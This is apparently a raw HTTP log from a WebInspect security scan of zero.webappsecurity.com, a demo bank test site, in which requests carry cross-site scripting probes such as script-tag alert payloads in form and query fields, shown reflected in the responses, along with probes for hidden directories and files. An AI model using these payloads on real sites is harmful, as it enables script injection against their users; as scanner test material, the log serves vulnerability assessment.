Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
cboPage=pc3HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
X-Powered-By: ASP.NET
Location: p3.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /testing/p3.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 345
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/p3.asp</font><font face="Arial" size=2>, line 5</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=%2AHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 63
Content-Type: text/html
Cache-control: private
<html>
<body>
An error has occurred
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /banklogin.asp?err=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"><script>alert("XSS")</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /join.asp?name=&email=>"'><img%20src="javascript:alert('XSS')">&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Error Exporting DataGET /_vti_pvt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /banklogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 247
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
Please specify the name of Forté service and page.<br>
<b>Usage:</b> http://web_server_name/cgi_directory_name/fortecgi?serviceName=Forté_service_name&pageName=request_page&other_info
<br>
<br>
<b>Forte WebEnterprise Version WE.1.0.E.0</b>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=--><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
